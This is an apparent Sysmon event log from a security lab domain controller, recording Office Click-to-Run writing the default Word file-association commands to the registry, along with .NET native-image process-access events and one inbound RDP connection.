14:57:43.592{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-310D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Wizard.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Backup.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 354300x800000000000000075877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.613{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42104-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000075876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 10341000x800000000000000075871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.514{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-300D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.RTF.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 10341000x800000000000000075869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.498{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-300D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.498{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-300D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" 13241300x800000000000000075862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.OpenDocumentText.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.452{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.TemplateMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\wordhtmltemplate\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" 13241300x800000000000000075842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.358{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Template.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.327{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\wordxmlfile\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" 13241300x800000000000000075834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.311{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 